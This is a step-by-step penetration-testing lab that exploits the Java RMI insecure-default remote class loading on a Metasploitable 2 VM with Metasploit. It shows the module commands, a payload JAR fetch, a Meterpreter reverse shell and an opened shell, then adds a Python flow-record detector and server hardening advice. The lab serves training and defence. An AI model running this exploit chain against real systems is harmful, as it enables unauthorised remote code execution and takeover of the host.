Java RMI Server Insecure Default Configuration RCE Vulnerability
Note: these labs are strongly results-oriented and use step-by-step guidance. As you progress, try to find more information and understand what you are doing.
Requirements
Kali Linux
The Kali Linux VM (or any other type of installation)
Metasploitable 2
The Metasploitable 2 VM
Metasploit Framework
Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP
The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.
Kali Linux IP
The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.
Laboratory Workflow
The following describes the steps to be carried out during the laboratory. You may introduce variations and learn from them.
1. Launch the Metasploit Framework
msfconsole
2. Search for the appropriate module
search java_rmi
Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  auxiliary/gather/java_rmi_registry                               normal     No     Java RMI Registry Interfaces Enumeration
   1  exploit/multi/misc/java_rmi_server              2011-10-15       excellent  Yes    Java RMI Server Insecure Default Configuration Java Code Execution
   2  auxiliary/scanner/misc/java_rmi_server          2011-10-15       normal     No     Java RMI Server Insecure Endpoint Code Execution Scanner
   3  exploit/multi/browser/java_rmi_connection_impl  2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation
3. Use the module
use exploit/multi/misc/java_rmi_server
4. Check the module options
options
Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.8.147    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)
5. Set the appropriate options
set RHOSTS 192.168.8.142
RHOSTS => 192.168.8.142
6. Run the exploit
exploit
[*] Started reverse TCP handler on 192.168.8.147:4444
[*] 192.168.8.142:1099 - Using URL: http://192.168.8.147:8080/UU6tSf5LVRd
[*] 192.168.8.142:1099 - Server started.
[*] 192.168.8.142:1099 - Sending RMI Header...
[*] 192.168.8.142:1099 - Sending RMI Call...
[*] 192.168.8.142:1099 - Replied to request for payload JAR
[*] Sending stage (58829 bytes) to 192.168.8.142
[*] Meterpreter session 3 opened (192.168.8.147:4444 -> 192.168.8.142:47995) at 2023-03-28 10:05:18 -0400
meterpreter >
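The output above shows the three stages of this attack as they appear on the network, and a defender can turn them into a detection. The module connects to the RMI registry on TCP 1099 and sends an RMI call that references a codebase URL on the attacker's HTTP server (the "Using URL" line, port 8080). Because the Metasploitable JVM still allows remote class loading (the insecure default of the `java.rmi.server.useCodebaseOnly` property in old Java releases), the server fetches the payload JAR ("Replied to request for payload JAR") and executes it, and the Java Meterpreter stage then connects back to the handler on port 4444. The Python script below is an added example and is not part of this lab, of Metasploit or of Metasploitable: it parses constructed flow records (modelled on the IP addresses and ports above, not captured traffic) and flags an inbound registry connection that is followed by the server itself connecting back to the same peer. The flow line format and the 60-second correlation window are assumptions of the example.

```python
"""Spot the network footprint of the Java RMI remote-class-loading attack
in connection (flow) records.

Added example for this lab; not part of Metasploit or Metasploitable.
The flow records below are constructed to mirror the msfconsole output
above; they are not captured traffic.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

RMI_REGISTRY_PORT = 1099  # default port of the Java RMI registry (RPORT above)


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


def parse_flow(line: str) -> Flow:
    """Parse one constructed flow line: '<ISO time> <src>:<port> -> <dst>:<port> <proto>'."""
    ts, src, _arrow, dst, proto = line.split()
    s_ip, s_port = src.rsplit(":", 1)
    d_ip, d_port = dst.rsplit(":", 1)
    return Flow(datetime.fromisoformat(ts), s_ip, int(s_port), d_ip, int(d_port), proto)


def find_rmi_codebase_chains(flows: Iterable[Flow],
                             window: timedelta = timedelta(seconds=60)) -> List[Dict]:
    """For each inbound TCP connection to the RMI registry port, look for the
    *server* opening connections back to that same peer shortly afterwards.

    In the exploit run above those callbacks are the JVM fetching the payload
    JAR from the attacker's HTTP server (8080) and the Meterpreter stage
    calling home (4444). One callback port is suspicious; two or more,
    right after an RMI call, is the complete chain.
    """
    ordered = sorted(flows, key=lambda f: f.ts)
    findings: List[Dict] = []
    for rmi in ordered:
        if rmi.proto != "tcp" or rmi.dport != RMI_REGISTRY_PORT:
            continue
        server, peer = rmi.dst, rmi.src
        callback_ports = sorted({
            f.dport for f in ordered
            if f.src == server and f.dst == peer
            and rmi.ts <= f.ts <= rmi.ts + window
        })
        if callback_ports:
            findings.append({
                "server": server,
                "peer": peer,
                "rmi_call_at": rmi.ts.isoformat(),
                "callback_ports": callback_ports,
                "severity": "high" if len(callback_ports) >= 2 else "medium",
            })
    return findings


# Constructed sample flows (timestamps lead up to the session opened above at 10:05:18).
SAMPLE_FLOWS = [
    # a legitimate RMI client on the LAN: lookup only, the server never connects back
    "2023-03-28T10:01:02 192.168.8.20:51000 -> 192.168.8.142:1099 tcp",
    # the lab exploit: RMI call, then the server fetches the JAR, then the reverse shell
    "2023-03-28T10:05:10 192.168.8.147:40310 -> 192.168.8.142:1099 tcp",
    "2023-03-28T10:05:12 192.168.8.142:36012 -> 192.168.8.147:8080 tcp",
    "2023-03-28T10:05:18 192.168.8.142:47995 -> 192.168.8.147:4444 tcp",
    # unrelated server traffic (DNS) that must not be attributed to the RMI peer
    "2023-03-28T10:06:00 192.168.8.142:36100 -> 192.168.8.1:53 udp",
]


def analyze_sample() -> List[Dict]:
    """Run the detector over the constructed sample and return the findings."""
    return find_rmi_codebase_chains(parse_flow(line) for line in SAMPLE_FLOWS)


if __name__ == "__main__":
    for finding in analyze_sample():
        print(finding)
```

Legitimate RMI can also produce server-to-client connections (clients that export their own callback objects), so treat a single callback port as a lead rather than a verdict; a plain-HTTP fetch of a JAR by the server immediately after an RMI call is the strong signal. On the server side the fix is to run the JVM with `-Djava.rmi.server.useCodebaseOnly=true` (the default since Java 7u21) and to keep the registry port off untrusted networks.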
7. Meterpreter session
Now you have a meterpreter session opened. This session will allow you to interact with the target.
meterpreter >
Look at the meterpreter help and check the possibilities.
help
Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel
8. Open a shell on the target machine
shell
meterpreter > shell
Process 1 created.
Channel 1 created.
Video
Video summarizing everything in this laboratory.
Questions
Now that you have completed this exploitation, try to answer the following:
Now, what can I do with the exploitation achieved?
Which type of privileges do I have on the exploited target?